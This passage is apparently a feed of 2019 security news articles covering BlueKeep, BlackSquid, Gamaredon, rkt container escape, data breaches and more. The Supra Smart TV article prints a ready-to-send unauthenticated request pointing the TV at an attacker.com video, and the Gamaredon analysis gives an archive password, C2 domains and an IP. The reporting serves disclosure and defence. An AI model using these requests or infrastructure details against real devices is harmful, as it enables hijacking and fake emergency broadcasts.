The supercomputer of the Australian Bureau of Meteorology targeted by the hackers is also used to provide weather data to defense agencies, its disclosure could give a significant advantage to a persistent attacker for numerous reasons.

Initial media reports blamed China for the cyber attack, in 2013 Chinese hackers were accused by authorities of stealing the top-secret documents and projects of Australia’s new intelligence agency headquarters.

Is China behid the last attack on the Australian National University?

Pierluigi Paganini

(SecurityAffairs – Australian National University, hacking)

The post The Australian National University suffered a major, sophisticated attack appeared first on Security Affairs.

Expert developed a MetaSploit module for the BlueKeep flaw

A security expert has developed a Metasploit module to exploit the critical BlueKeep vulnerability and get remote code execution.

The security researcher Zǝɹosum0x0 has developed a module for the popular Metasploit penetration testing framework to exploit the critical BlueKeep flaw.

The vulnerability, tracked as CVE-2019-0708, impacts the Windows Remote Desktop Services (RDS) and was addressed by Microsoft with May 2019 Patch Tuesday updates. BlueKeep is a wormable flaw that can be exploited by malware authors to create malicious code with WannaCry capabilities.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

The Metasploit module could be used to trigger the BlueKeep flaw on vulnerable Windows XP, 7, and Server 2008, but the expert has not publicly disclosed it to avoid threat actors abusing it.

Unfortunately, it has been determined that roughly one million devices exposed online are vulnerable to attacks exploiting the BlueKeep Windows vulnerability and hackers are ready to hit them.

BlueKeep

Zǝɹosum0x0 also published a video PoC that shows how to exploit the BlueKeep vulnerability on a Windows 2008 system.

According to Zǝɹosum0x0, the module could be used also against machines running on Windows 7 and Server 2008 R2.

This Metasploit module doesn’t work against Windows Server 2003.

Zǝɹosum0x0 also developed a scanner Metasploit module for the CVE-2019-0708 BlueKeep RCE vulnerability.

At the end of May, Microsoft issued a second warning for users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

The NSA also issued an alert to urge users to install the security patches to address the BlueKeep flaw.

“The National Security Agency is urging Microsoft Windows administrators and users to ensure they are using a patched and updated system in the face of growing threats. Recent warnings by Microsoft stressed the importance of installing patches to address a protocol vulnerability in older versions of Windows ” reads the NSA’s advisory.

“This is the type of vulnerability that malicious cyber actors frequently exploit through the use of software code that specifically targets the vulnerability. For example, the vulnerability could be exploited to conduct denial of service attacks. It is likely only a matter of time before remote exploitation code is widely available for this vulnerability. NSA is concerned that malicious cyber actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.

NSA urges everyone to invest the time and resources to know your network and run supported operating systems with the latest patches.”

Pierluigi Paganini

(SecurityAffairs – Metasploit, hacking)


The post Expert developed a MetaSploit module for the BlueKeep flaw appeared first on Security Affairs.

BlackSquid malware uses multiple exploits to drop cryptocurrency miners

A new piece of malware appeared in the threat landscape, dubbed BlackSquid it targets web servers with several exploits to deliver cryptocurrency miners.

Security experts at Trend Micro have discovered a new Monero cryptomining miner, dubbed BlackSquid, that is targeting web servers, network drives, and removable drives.

The new piece of malware leverages many exploits to compromise target systems and implements evasion techniques to avoid detection.

According to the experts, BlackSquid has worm-like propagation capabilities and it can be used to launch brute-force attacks.

“This malware, which we named BlackSquid after the registries created and main component file names, is particularly dangerous for several reasons.” states Trend Micro. “It employs anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to continue with installation or not. It also has wormlike behavior for lateral propagation.”

The peculiarity of the BlackSquid malware is the employment of a set of the most dangerous exploits

While many forms of malicious code will employ one or two exploits for known vulnerabilities in popular systems, BlackSquid differs in this regard. 

The list of exploits used by the malware includes EternalBlue, DoublePulsar; exploits for CVE-2014-6287, Tomcat arbitrary file upload vulnerability CVE-2017-12615, CVE-2017-8464; and three ThinkPHP exploits for different versions of the framework.

The threat is delivered via infected webpages, exploits, or through removable network drives.

BlackSquid leverages the GetTickCount API to randomly select IP addresses of a web server and to attempt to infect them.

The malware implements anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to deliver the miner or not.

“Simultaneous with its attacks, BlackSquid also downloads and executes two XMRig cryptocurrency-mining components.! continues the analysis. “The miner in resource is the primary miner used, but it also determines if the targeted system has a video card. If the system checks for Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malware downloads the second component into the system to mine for graphics processing unit (GPU) resource.”

The malware halts the infection routine if at least one of the following conditions is met:

  • The victim’s username is included in a list of common sandbox usernames:
  • The disk drive model is equal to one included in a specific list;
  • The device driver, process, and/or dynamic link library is one of a specific list used by the malicious code.

BlackSquid exploits the EternalBlue-DoublePulsar exploits (MS17-010 SMB RCE exploit) to propagate through the target network. The malware uses the remote code execution (RCE) flaw to gain the same user rights as the local system user.

If the infected system has a video card such as Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malicious code downloads a second component into the system to mine for graphics processing unit (GPU) resource.

Trend Micro says that the majority of BlackSquid attacks have, so far, been detected in Thailand and the United States. The last week of May is the most active period on record.

The presence of coding errors and skipped routine suggests that BlackSquid is still in the process of development and testing.

“Given its evasion techniques and the attacks it is capable of, BlackSquid is a sophisticated piece of malware that may cause significant damage to the systems it infects. If successful, this malware may enable an attacker to escalate unauthorized access and privileges, steal proprietary information, render hardware and software useless, or launch attacks on an organization (or even from an organization into another).” concludes Trend Micro.

“But considering the erroneous code and purposely skipped routines, we also think that the cybercriminals behind this malware are likely in the development and testing stages;”

Pierluigi Paganini

(SecurityAffairs – BlackSquid, hacking)

The post BlackSquid malware uses multiple exploits to drop cryptocurrency miners appeared first on Security Affairs.

CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions

A security expert disclosed technical details of a new unpatched vulnerability (CVE-2019-9510) that affects Microsoft Windows Remote Desktop Protocol (RDP).

Security expert Joe Tammariello of Carnegie Mellon University Software Engineering Institute (SEI), discovered a new unpatched vulnerability in Microsoft Windows Remote Desktop Protocol (RDP).

The flaw, tracked as CVE-2019-9510, could be exploited by client-side attackers to bypass the lock screen on remote desktop (RD) sessions.

In order to exploit the flaw, the attacker requires physical access to a targeted system, for this reason, it received a CVSS score of 4.6 (medium severity). The flaw affects versions of Windows starting with Windows 10 1803 and Server 2019.

The vulnerability resides in the way Microsoft Windows Remote Desktop feature requires clients to authenticate with Network Level Authentication (NLA).

“Microsoft Windows RDP Network Level Authentication can allow an attacker to bypass the lock screen on remote sessions.” reads the advisory published by the CERT/CC.

“Starting with Windows 10 1803 and Windows Server 2019, Windows RDP handling of NLA-based RDP sessions has changed in a way that can cause unexpected behavior with respect to session locking. If a network anomaly triggers a temporary RDP disconnect, upon automatic reconnection the RDP session will be restored to an unlocked state, regardless of how the remote system was left. “

When a network anomaly occurs it could trigger a temporary RDP disconnect, but upon automatic reconnection the RDP session will be restored to an unlocked state. The RDP session will be restored without considering the status of the remote system before the disconnection. For example, consider the following steps:

Below the attack scenario described by the CERT:

  • User connects to remote Windows 10 1803 or Server 2019 or newer system using RDP.
  • User locks remote desktop session.
  • User leaves the physical vicinity of the system being used as an RDP client

An attacker can interrupt the network connectivity of the RDP client system, this will cause the session with the remote system being unlocked without providing credentials.

The advisory published by the CERT/CC states that two-factor authentication systems that integrate with the Windows login screen (i.e. Duo Security MFA) could be bypassed exploiting the CVE-2019-9510 flaw.

“Two-factor authentication systems that integrate with the Windows login screen, such as Duo Security MFA, are also bypassed using this mechanism. Any login banners enforced by an organization will also be bypassed.” continues the advisory.

The CERT/CC suggest the following workarounds:

  • Lock the local system as opposed to the remote system.
  • RDP sessions should be disconnected rather than locked to invalidate the current session and prevent an automatic RDP session reconnection without credentials.

Tammariello reported the flaw to Microsoft on April 19, but the company did not acknowledge the flaw

“[The] behavior does not meet the Microsoft Security Servicing Criteria for Windows,” states the company.

Pierluigi Paganini

(SecurityAffairs – RDP, CVE-2019-9510)

The post CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions appeared first on Security Affairs.

OilRig’s Jason email hacking tool leaked online

A few hours ago, a new email hacking tool dubbed Jason and associated with the OilRig APT group was leaked through the same Telegram channel used to leak other tools.

A new email hacking tool associated with the Iran-linked OilRig APT group was leaked through the same Telegram channel that in April leaked the source code of 6 tools used by the crew.

In April, a hacker group that goes online with the name Lab Dookhtegan have disclosed details about operations conducted by the Iran-linked cyber-espionage group tracked as OilRigAPT34, and HelixKitten. The Lab Dookhtegan hackers used a Telegram channel to dump information about the OilRig infrastructure, revealing details about its hacking tools, members, and operations. The hackers also disclosed IP addresses and domains involved in operations conducted by the group over the years.

Now the group released a tool that was allegedly used by OilRig “for hacking emails and stealing information.”

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

The new tool could be used to hijack Microsoft Exchange email accounts, it was dubbed Jason and currently, it is has a detection rate of 0 on VirusTotal.

Jason email hijacking

The Jason email hijacking tool works is used by threat actors to carry out brute-force attacks using a dictionary of password samples and four text files containing numerical patterns.

According to VirusTotal the sample was compiled in 2015 and at the time of writing it is detected only by 7 out of 71 antivirus solutions.

Jason email hijacking detection

The leak of the hacking tools allowed security firms to analyze them and implements the rules for their detection.

On the other side, hackers could use these tools to carry out the attacks making hard their attribution.

You can find further info on the Jason tool in a blog post published by Omri Segev Moyal, the co-founder at Minerva Labs.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – OilRig, Jason email hijacking tool)


The post OilRig’s Jason email hacking tool leaked online appeared first on Security Affairs.

A month later Gamaredon is still active in Eastern Europe

Gamaredon continues to target Ukraine, Yoroi-Cybaze ZLab spotted a new suspicious activity potentially linked to the popular APT group

Introduction

The Gamaredon attacks against Ukraine don’t seem to have stopped. After a month since our last report we spotted a new suspicious email potentially linked to the Gamaredon group. The group was first discovered by Symantec and TrendMicro in 2015 but evidence of its activities has been dated back to 2013. During recent times, Gamaredon is targeting the Ukrainian military and law enforcement sectors too, as officially stated by the CERT-UA.

Cybaze-Yoroi ZLAB team dissected the artifact recovered from their latest attack to figure out evolution or changes in the threat actor TTPs.

Technical Analysis

Figure 1. Malicious e-mail 

The infection chain is composed by different stages of password protected SFX (self extracting archive), each containing vbs or batch scripts.

At the final stage of this malicious chain, we found a customized version of UltraVNC, a well known off-the-shelf tool for remote administration, modified by the Group and configured to connect to their command and control infrastructure. Despite its apparent triviality, the Matryoshka of SFX archives reached a low detection rate, making it effective.

Stage 1

Hash5555a3292bc6b6e7cb61bc8748b21c475b560635d8b0cc9686b319736c1d828e
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:PXwOrRsTyuURQFsVhIe74lpyevrM4vZxn6k1gQ Guo:PgwRAyuURQ2/1YpyeT7ok8

Table 1. Information about initial SFX file

The mail attachment is a RAR archive containing a folder named “suspected” in Ukrainan and a single suspicious file with “.scr” extension. At first glance, it is possible to notice the PowerPoint icon associated to the file, normally not belonging to .scr files.

Figure 2. Content of malicious e-mail
Figure 3. Low AV detection of SFX malware

The file has a very low detection rate on VirusTotal platform: only four AV engines are able to identify it as malicious and only on engine understands it may be associated to the Gamaredon implant.

After a quick analysis, the real nature of the .scr file emerges: it is a Self Extracting Archive containing all the files in Figure 4.

They are extracted into “%TEMP%\7ZipSfx.000\” and the first command to be executed is “15003.cmd”, which firstly checks for the presence of malware analysis tools. If it detects the presence of Wireshark or Procexp tools, it kill itself. Otherwise, it copies:

Figure 4. Content of SFX
  • the “11439” file in “%USERNAME%\winupd.exe”
  • the “28509” file in “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winupd.lnk” pointing to the previous executable and granting persistence to machine reboot
  • the “20261” file in “%TEMP%\7ZipSfx.000\Document.docx”
Figure 5. Script content in  “15003.cmd” file

At the same time, the extracted document will be shown in order to divert the user attention and to continue the infection unnoticed. This document, written in Ukraine language, contains information about a criminal charge.

Figure 6. Fake document to divert attention on malware execution
Figure 7. Execution of “winupd.exe” (SFX) and relative password (uyjqystgblfhs)

Instead, exploring the LNK file is possible to see it’s able to start the “winupd.exe” file, with a particular parameter: %USERPROFILE%\winupd.exe -puyjqystgblfhs. This behavior indicates the “winupd.exe” executable is another Self Extracting Archive, but this time it is password protected.

Stage 2

Hashfd59b1a991df0a9abf75470aad6e2fcd67c070bfccde9b4304301bc4992f678e
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:bGKUQ8Lj7S6Jr1ye4SM4vzxn3k1jQ GujR:biJr1yeNxJkro

Table 2. Information about second SFX file

When launched, it extracts its content in “%TEMP%\RarSFX0\”, then executes the “setup.vbs” script, which contains only two code lines. So, the execution flow moves on “1106.cmd”.

Figure 8. Content of “setup.vbs” script
Figure 9. Content of “%APPDATA%\Local\Temp\RarSFX0” after “winupd.exe” (SFX) extraction

The source code of “1106.cmd” is full of junk instructions. However, in the end it performs a simple action: it writes a new VBS script in “%APPDATA%\Microsoft\SystemCertificates\My\Certificates\” . This script tries to download another malicious file from “http://bitvers.ddns[.net/{USERNAME}/{DATE}/index.html”.  Performing many researches abot this server we noticed the continuously modification of associated records. Indeed, the attacker has changed many time the domain names in the latest period. Moreover, querying the services behind the latest associated DNS record the host responds with “403 Forbidden” message too, indicating the infrastructure may still be operative.

Figure 10. Information about C2 and relative DNS

The scripts creates a new scheduled task in order to periodically execute (every 20 mins) the previous VBS script.

Figure 11. POST request sent to C2 with victim machine information

Also, it collects all the information about the victim’s system using the legit “systeminfo” Microsoft tool and sends them to the remote server through a POST request using the “MicrosoftCreate.exe” file, which actually is the legit “wget” utility. The response body will contain a new executable file, named “jasfix.exe”, representing the new stage.

Stage 3

Hashc479d82a010884a8fde0d9dcfdf92ba9b5f4125fac1d26a2e36549d8b6b4d205
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:Gfxwgmyg5EOJ+IIpBz2GAROm560XVEC1Ng MdfaQbhUfEIg+m:GJpgIdPzeRBJVEC1CMd

Table 3. Information about third SFX file

After few researches, we were able to retrieve the “jasfix.exe” file, the next stage of the infection chain. After downloading it, we notice that it is another SFX archive other files.

Figure 12. Content of “jasfix.exe” (SFX) downloaded from the C2

The first file to be executed is “20387.cmd” that renames the “win.jpg” into “win.exe”, another password protected SFX.

Stage 4

Hash28eff088a729874a611ca4781a45b070b46302e494bc0dd53cbaf598da9a6773
ThreatGamaredon Pteranodon implant
Brief DescriptionSFX file
Ssdeep24576:9GKUQ8vCTAaaJVssTk3OwO+vl+3yt6Xf IAR:9vaJes2Ocl7t9S

Table 4. Information about fourth SFX file

This latest SFX archive follows the typical pattern of the Gamaredon archives Matryoshka, where the “.cmd” file is in designed to decrypt and run next stage. This time using the string “gblfhs” as password.

Figure 13. Script to rename “win.jpg” into “win.exe”, decrypt and run next stage
Figure 14. Content of “win.exe” (last SFX of infection)

However, the file named “win32.sys” is particularly interesting: it actually is a PE32 executable file. Exploring the “.rsrc” section of the PE32 executable, we noticed different “.class” files. Two of them are named “VncCanvas” and “VncViewer”. These files are part of a legit Remote Administration Tool (RAT) named UltraVNC, available at this link.

Figure 15. Content of “win32.sys”

The “win.exe” SFX archive contains other interesting files too: one of them is an “.ini” configuration file containing all the parameters and the password used by the UltraVNC tool.

Figure 16. Configuration file used by “win32.sys” (Custom ultraVNC)

Finally, the RAT tries to establish a connection to the “torrent-vnc[.ddns[.net” domain, headed to an endpoint reachable on 195.88.208.51, a VPS hosted by the Russian provider IPServer.

Figure 17. C2 and relative port used by RAT

Conclusion

This recent attack campaign shows the Gamaredon operation are still ongoing and confirms the potential Russian interest about infiltrating the East European ecosystem, especially the Ukranian one. The techniques and the infection patterns the Group is using is extremely similar to the other attacks spotted in the past months of 2019, showing the Matryoshka structure to chain SFX archives, typical of their implant, but still effective and not easily detectable by several antivirus engines.

Also, digging into this infection chain, we noticed the come back of third party RATs as payload, a Gamaredon old habit that the usage of the custom-made Pterodo backdoor replaced few times ago.

Acknowledgement: special thanks to @JAMESWT_MHT for info and samples.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

https://blog.yoroi.company/research/the-russian-shadow-in-eastern-europe-a-month-later/

Pierluigi Paganini

(SecurityAffairs – Gamaredon, state-sponsored hacking)

The post A month later Gamaredon is still active in Eastern Europe appeared first on Security Affairs.

macOS zero-day in Mojave could allow Synthetic Clicks attacks

A security expert found a flaw could be exploited to bypass macOS security and privacy features by using synthetic clicks.

The popular white hat hacker Patrick Wardle, co-founder and chief research officer at Digita Security, discovered a vulnerability that could be exploited to bypass security warnings by performing ‘Synthetic Clicks’ on behalf of users without requiring their interaction.

In June, Apple introduced a core security feature in MacOS that force applications into taking permission from users before accessing sensitive data or components on the system (i.e. device camera, microphone, location data, photos, messages, and browsing history).

Wardle disclosed the issue over the weekend during the meeting arranged by his company.

Wardle explained that a “subtle code-signing issue” in macOS could allow the hack of any trusted application to generate synthetic clicks, bypassing the core security feature introduced in 2018. Malware developers and hackers might use synthetic mouse-click attacks to emulate human behavior in approving security warnings.

The attack could be triggered by an attacker with local access to the device when the screen is dimmed, this means that it could be very difficult to spot.

According to Wardle, no special privileges are required to carry out the attack.

The attack ties the Transparency Consent and Control (TCC) system, which maintains databases for privacy control settings. The system also includes a compatibility database, stored in the AllowApplicationsList.plist. This database is used to manage access to protected functions for specific versions of apps with specific signatures, it works as a sort of whitelist.

Wardle explained that an attacker can modify one of the applications in the whitelist and execute it to generate synthetic clicks. An attacker can download a modified version of the targeted app and run it. Apple is not able to detect the changes to the targeted app due to a flaw in code validation checks.

 synthetic clicks

Wardle discovered several issued in macOS that could be exploited to allow synthetic clicks, he publicly disclosed one in September 2018 and another one at DefCon 2018.

The security updates released by Apple over the time failed in completely addressing the issue allowing the expert to launch synthetic click attacks. Wardle reported his discovery to Apple a few days ago that acknowledged the problem and likely is already working to address it.

Waiting for a fix, macOS users could install the GamePlan, the endpoint protection product designed by Digita Security, that prevents synthetic clicks.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Apple, zero-day)

The post macOS zero-day in Mojave could allow Synthetic Clicks attacks appeared first on Security Affairs.

Australian teenager hacked into Apple twice for a job

What can Apple ‘s fan do to work with his favorite company? A teen opted out to hack it twice.

A 17-year-old teenager Australian teenager decided to attract the attention of the tech giant by gaining access to its mainframe with false credentials.

The teen was dreaming of a job in Apple and was convicted that the actions meaning much more of a static CV or applications for internship.

Unfortunately, the teen was identified and he has been found guilty of hacking twice into Apple’s infrastructure in 2015 and 2017. 

Apple SQLite bugs

“The boy, who is now 17, faced the Adelaide Youth Court and pleaded guilty to multiple computer hacking charges.” reported the Australian ABC website.

“The court heard he and another teenager from Melbourne hacked into the technology giant’s mainframe in December 2015 and then again in early 2017 and downloaded internal documents and data.”

The teenager is from Adelaide, Australia, and violated an Apple mainframe by creating false credentials, he was helped by another young hacker. The lawyer of the teen, Mark Twiggs, explained to the court that his client had no bad intentions and due to his young age he was not aware of the severe consequences.

This offending started when my client was 13 years of age, a very young age,” said Twiggs.

“He had no idea about the seriousness of the offence and hoped that when it was discovered that he might gain employment at this company.
“He didn’t know this was going to lead to anything other than a job at the end of it, [this] happened in Europe, a similar person got caught and they ended up getting employed by the company.”

The good news is that Apple did not incur any financial or intellectual loss from the hack.

Magistrate David White only placed the teenager on a $500 bond to be of good behaviour for nine months.

“He is clearly someone who is a gifted individual when it comes to information technology, that being said, those who have this advantage of being gifted doesn’t give them the right to abuse that gift,” said the Magistrate.

“The manner in which the world functions is one that is heavily reliant on computer technology and those who unlawfully interfere with those systems can do enormous amounts of damage.”

Magistrate White asked the guy to use his talent in a better way in the future avoiding to violate any law.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Apple, hacking)

The post Australian teenager hacked into Apple twice for a job appeared first on Security Affairs.

Hack The Sea: Bridging the gap between hackers and the maritime sector

There’s a not a lot of researchers probing the security of computer systems underpinning the maritime industry. The limitations that keep that number low are obvious: both the specialized knowledge and equipment is difficult to come by. And, as Ken Munro of UK-based Pen Test Partners told us a year ago, not many people move from shipping into pentesting (and into information security in general). But things are looking up for those who are interested: … More

The post Hack The Sea: Bridging the gap between hackers and the maritime sector appeared first on Help Net Security.

Australian National University hit by huge data breach

Vice-chancellor says hack involved personal and payroll details going back 19 years

The Australian National University is in damage control after discovering a major data breach a fortnight ago in which a “significant” amount of staff and student information was accessed by a “sophisticated operator”.

In a message to staff and students, vice-chancellor Brian Schmidt said someone illegally accessed the university’s systems in late 2018.

Related: Australian security services investigate attempted cyber attack on parliament

Continue reading...

The Guardian view on cybercrime: the law must be enforced | Editorial

Governments and police must take crime on the internet seriously. It is where we all live now

About half of all property crime in the developed world now takes place online. When so much of our lives, and almost all of our money, have been digitised, this is not surprising – but it has some surprising consequences. For one thing, the decline in reported property crimes trumpeted by successive British governments between 2005 and 2015 turns out to have been an illusion. Because banks were not required to report fraud to the police after 2005, they often didn’t. It would have made both banks and police look bad to have all that crime known and nothing done about it. The cost of the resulting ignorance was paid by the rest of government, and by the public, too, deprived of accurate and reliable knowledge. Since then, the total number of property crimes reported has risen from about 6m to 11m a year as the figures have taken computerised crime into account.

The indirect costs to society are very much higher than the hundreds of millions that individuals lose. One example is the proliferation of plagiarism software online, which developed an entire industry in poor, English-speaking countries like Kenya, serving idle or ignorant students in England and North America. The effort required by schools and universities to guard against such fraud has been considerable, and its cost entirely disproportionate to the gains made by the perpetrators.

Continue reading...

Gaining Root Access to Host through rkt Container hack

Unpatched vulnerabilities affect the rkt container runtime that could be exploited by an attacker to escape the container and gain root access to the host. 

The security researchers Yuval Avrahami discovered some vulnerabilities in the rkt containter that could be exploited by an attacker to compromise the underlying host when a user executes the ‘rkt enter’ command into an attacker-controlled pod.

rkt (pronounced like a “rocket”) is a CLI for running application containers on Linux. rkt is designed to be secure, composable, and standards-based.

The basic unit of execution at runtime is a pod, that includes multiple containers running in a shared context.

The ‘rkt enter’ command allows users to execute binaries in a running container. The binaries are executed as root, with no seccomp filtering or cgroup isolation, the only restriction is represented by namespaces. 

Avrahami discovered that it is possible to escape the container by triggering the vulnerabilities. 

“The ‘rkt enter’ command allows users to run a binary in a running container, and is the rkt equivalent of ‘docker exec’.” states the expert.

“Binaries from the container executed via ‘rkt enter’ run as root, with all capabilities, and with no seccomp filtering or cgroup isolation applied. They are only restricted by namespaces, which are not enough to prevent them from breaking out and compromising the host.”

Below the list of the issues reported to RedHat (who acquired CoreOS in mid-2018):

  • CVE-2019-10144: processes run with `rkt enter` are given all capabilities during stage 2
  • CVE-2019-10145: processes run with `rkt enter` do not have seccomp filtering during stage 2
  • CVE-2019-10147: processes run with `rkt enter` are not limited by cgroups during stage 2

The researchers published a video PoC that shows the exploitation of the above vulnerabilities.

The attacker needs to have root access to the container, then when the user runs the ‘rkt enter’ command, he can overwrite binaries and libraries in the container to run his malicious code. 

For example, an attacker can overwrite /bin/bash in the container, because it is the default binary executed if the user doesn’t specify another.

The attacker could also overwrite libc.so.6 in the container, which is likely to be loaded by processes spawned with ‘rkt enter’. Using the gcc constructor attribute the code is run whenever the modified libc library is loaded by a process.

“Once an attacker is running in the context of a container process spawned by ‘rkt enter’, he can escape the container and gain root access on the host with relative ease, as he runs with all capabilities, no seccomp filtering and without cgroup isolation,” continues the security researcher. 

The expert provides as an example of exploitation the escape via mounting the host’s root directory.

Mounting the host root directory using the ‘mknod’ and ‘mount’ syscalls, would give the attacker root access on the host. The expert also published a video PoC for this attack.

Avrahami reported the flaws to RedHat and CoreOS, but RedHat revealed that at the time it has no plan for addressing them. RedHat asked the expert to share his findings with the community of the users.

“While investigating rkt I also discovered a way to create malicious ACI/OCI images that will compromise the host when run. Although this is certainly not ideal, malicious images are not a part of rkt’s threat module. Running images from an untrusted source is not aligned with rkt’s recommendations nor proper use,” concludes the researcher. 

“As I stated at the start of this blog, if you are using rkt, avoid using the ‘rkt enter’ command as the vulnerabilities in it are currently unpatched. I also suggest considering alternative container runtimes which are more steadily maintained, such as Docker, podman or LXD.”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – rkt container, hacking)

The post Gaining Root Access to Host through rkt Container hack appeared first on Security Affairs.

Expert shows how to Hack a Supra Smart Cloud TV

Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication

Summary:
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI

Supra Smart Cloud TV

Technical Observation: 
We are abusing `openLiveURL()` which allows a local attacker to broadcast video on supra smart cloud TV. I found this vulnerability initially by source code review and then by crawling the application and reading every request helped me to trigger this vulnerability.

Vulnerable code:

 function openLiveTV(url)
{
$.get("/remote/media_control", {m_action:'setUri',m_uri:url,m_type:'video/*'},
function (data, textStatus){
if("success"==textStatus){
alert(textStatus);
}else
{
alert(textStatus);
}
});
}

Vulnerable request:

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

To trigger the vulnerability you can send a crafted request to the URL,

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

Although the above mention URL takes (.m3u8) format based video. We can use `curl -v -X GET` to send such request, typically this is an unauth remote file inclusion. An attacker could broadcast any video without any authentication, the worst case attacker could leverage this vulnerability to broadcast a fake emergency message (Scary right?)

Although, this is still unpatched because I didn’t find any-way to contact the vendor.

The above video PoC shows a successful demonstration of this attack where Mr.Steve Jobs speech is suddenly replaced with attacker fake “Emergency Alert Message” this may make end user panic.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original post at:

https://www.inputzero.io/2019/06/hacking-smart-tv.html

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – hacking, Smart Cloud TV)

The post Expert shows how to Hack a Supra Smart Cloud TV appeared first on Security Affairs.

Threat actors abuse Microsoft Azure to Host Malware and C2 Servers

Microsoft Azure cloud services are being abused by threat actors to host malware and as command and control (C&C) servers.

Threat actors look with great interest at cloud services that could be abused for several malicious purposes, like storing malware or implementing command and control servers.

Now it seems to be the Microsoft Azure’s turn, recently experts reported several attacks leveraging the platform to host tech-support scam and phishing templates.

microsoft azure

Security researchers already spotted some malware hosted on the Microsoft Azure platform.

Researchers at AppRiver observed attackers deploying malware on the Microsoft Azure platform, the bad news is that those malicious codes were not removed after some weeks, on May 29.

“Now the attacks have escalated to malware being hosted on the Azure service. Not only is Azure hosting malware, it is also functioning as the command and control infrastructure for the malicious files” reads the analysis published by AppRiver.

“On May 11, 2019, malware researchers @JayTHL & @malwrhunterteam discovered the malicious software on Azure. It was reported to Microsoft on May 12 for abuse via ticket #SIR0552640.  However, the original malware (plus additional samples uploaded since) still resided on the Azure site as of May 29, 2019 – 17 days later.”

Experts pointed out that Azure is failing to detect the malware hosted on Microsoft’s servers.

“No service is infallible to being attacked or exploited. It’s evident that Azure is not currently detecting the malicious software residing on Microsoft’s servers. However, if a user attempts to download the executables, Windows Defender does detect the malicious files.”

In one case, a sample named searchfile.exe was uploaded to VirusTotal on April 26, 2019. Even is Windows Defender detects the malware its presence on Azure is not currently blocked. Unfortunately, experts reported many other similar cases.

Experts believe that this trend will continue to grow, threat actors will not only abuse Microsoft Azure, but other cloud services (i.e. Google Drive, Dropbox, and Amazon) will be exploited by attackers to avoid detection.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Microsoft Azure, hacking)

The post Threat actors abuse Microsoft Azure to Host Malware and C2 Servers appeared first on Security Affairs.

Leicester City Football Club disclosed a card breach

Leicester City Football Club disclosed a card breach that affected its website, hackers stole payment card data, including card numbers and CVVs.

Leicester City Football Club revealed that hackers have breached its website (https://shop.lcfc.com/) and stole credit card data of people that bought products disclosed a card breach that affected its website, hackers stole payment card data, including card numbers and CVVs.

leicester city

According to the club, the card breach affected some users between April 23 and May 4, the company already notified the supporters whose details were compromised.

The club also informed the authorities and the Information Commissioners Office (ICO), it also launched an immediate investigation.

“Upon discovery of the breach, the security of our retail platform was immediately restored and appropriate measures were taken to ensure the security of all other online assets.” reads the statement issued by the company.

Exposed data includes card number, name of card holder, expiry date and CVV.

“Technical investigations are still ongoing, but we can confirm that as a result of the incident your payment card information was compromised. This includes your card number, name of card holder, expiry date and CVV. We can confirm that your SecureCode was not compromised. That information is needed to attempt to conduct transactions using your account.” reads the email sent to the customers.

At the time of writing, there is information about the attack and the way hackers breached the website of the English club, it is also not clear how many supporters have been impacted.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Leicester City Football Club, card breach)

The post Leicester City Football Club disclosed a card breach appeared first on Security Affairs.

